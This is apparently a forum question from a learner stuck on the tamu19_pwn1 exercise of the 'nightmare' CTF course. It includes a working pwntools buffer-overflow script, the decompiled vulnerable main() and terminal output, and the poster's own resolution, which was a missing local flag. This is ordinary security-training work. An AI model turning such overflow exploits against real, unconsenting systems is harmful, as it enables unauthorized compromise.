To be as concise as possible, I am running a python exploit that passes all the checks that it needs to, but when the original ELF is supposed to write the flag to flag.txt, nothing gets displayed. I have compared (and even copied) other solutions to this challenge, but none actually display the flag for me. Is it a permissions issue with my empty flag.txt file?
For those that would like me to elaborate on the issue: I am new to my whole system architecture, software, and techinques that I am using, so there may be a simple problem that I just do not know about. I am currently going through nightmare by guy in a tuxedo, and I am stuck on problem Tamu'19_pwn1. Repository: https://github.com/guyinatuxedo/nightmare/tree/master/modules/04-bof_variable/tamu19_pwn1
I am running Ubuntu 22.04 on a VM and using Python 3.10.12
I have my completed script in python3:
# Import pwntools
from pwn import *
# Set the target file
target = process('./pwn1')
# Our payload should overwrite the 43 bytes and input our desired value
payload = b"0"*0x2b + p32(0xdea110c8)
# Send the first two lines for the first two questions
print(target.recvline()) # recieve the Intro
print(target.recvline()) # recieve Q1
target.sendline("Sir Lancelot of Camelot")
print(target.recvline()) # Q2
target.sendline("To seek the Holy Grail.")
# Send out payload at the 3rd line
print(target.recvline()) #Q3
target.sendline(payload)
# Print the flags
print(target.recvline()) # Outro
print(target.recvline()) # flag
# I used .interactive() but that did not work either
#target.interactive()
The file I am exploiting is in C. Here is a snippet of main() from the file:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Removing unreachable block (ram,0x000108bb) */
undefined4 main(void)
{
int strcmpResult0;
int strcmpResult1;
char input [43];
setvbuf(stdout,(char *)0x2,0,0);
puts(
"Stop! Who would cross the Bridge of Death must answer me these questions three, ere theother side he see."
);
puts("What... is your name?");
fgets(input,0x2b,stdin);
strcmpResult0 = strcmp(input,"Sir Lancelot of Camelot\n");
if (strcmpResult0 != 0) {
puts("I don\'t know that! Auuuuuuuugh!");
/* WARNING: Subroutine does not return */
exit(0);
}
puts("What... is your quest?");
fgets(input,0x2b,stdin);
strcmpResult1 = strcmp(input,"To seek the Holy Grail.\n");
if (strcmpResult1 == 0) {
puts("What... is my secret?");
gets(input);
puts("I don\'t know that! Auuuuuuuugh!");
return 0;
}
puts("I don\'t know that! Auuuuuuuugh!");
/* WARNING: Subroutine does not return */
exit(0);
}
I should be expecting this right before EOF:
flag{g0ttem_boyz}
Instead I am getting an endline, which is what my flag.txt originially contains. Here is what I get in my terminal when I run my exploit:
$ python exploit.py
[+] Starting local process './pwn1': pid 12060
[*] Switching to interactive mode
[*] Process './pwn1' stopped with exit code 0 (pid 12060)
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
What... is your quest?
What... is my secret?
Right. Off you go.
[*] Got EOF while reading in interactive
$
Unfortunately to get the best understanding of the issue you may have to open the repository linked above.
I figured out that the issue was my personal confusion with the challenge itself. Since the the challenge used to run on a server that holds the flag, it now is only going to run locally on the computer, simulating the process of hacking a server. Therefore I needed to add a flag.txt in my local directory.